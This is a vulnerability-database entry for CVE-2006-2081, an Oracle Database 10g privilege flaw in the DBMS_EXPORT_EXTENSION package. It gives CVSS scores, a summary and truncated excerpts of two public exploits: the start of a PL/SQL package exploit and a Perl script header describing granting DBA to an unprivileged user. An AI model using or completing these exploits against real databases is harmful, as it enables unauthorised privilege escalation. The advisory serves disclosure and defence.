CVE-2006-2081

Published: 27/04/2006 Updated: 18/10/2018
CVSS v2 Base Score: 4.6 | Impact Score: 6.4 | Exploitability Score: 3.9
VMScore: 470
Vector: AV:L/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Oracle Database Server 10g Release 2 allows local users to execute arbitrary SQL queries via the GET_DOMAIN_INDEX_METADATA function in the DBMS_EXPORT_EXTENSION package. NOTE: this issue was originally linked to DB05 (CVE-2006-1870), but a reliable third party has claimed that it is not the same issue. Based on details of the problem, the primary issue appears to be insecure privileges that facilitate the introduction of SQL in a way that is not related to special characters, so this is not "SQL injection" per se.

Vulnerable Product

oracle database server

Exploits

/* 0day, description is wrong /str0ke */
/*
 * Fucking NON-0 day($) exploit for Oracle 10g 102020
 *
 * Patch your database now!
 *
 * by N1V1Hd $3c41r3
 *
 */
CREATE OR REPLACE PACKAGE MYBADPACKAGE AUTHID CURRENT_USER IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYSodciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env SYSodcienv) RETURN NUMBER;
END;
/
CREA ...

#!/usr/bin/perl
#
# Remote Oracle dbms_export_extension exploit (any version)
# Grant or revoke dba permission to unprivileged user
#
# Tested on Oracle 10g - Release 102010
# Oracle 9i - Release 92020
#
# REF: wwwsecurityfocuscom/bid/17699
#
# AUTHOR: Andrea "bunker" Purificato
# rawlabmindcreation ...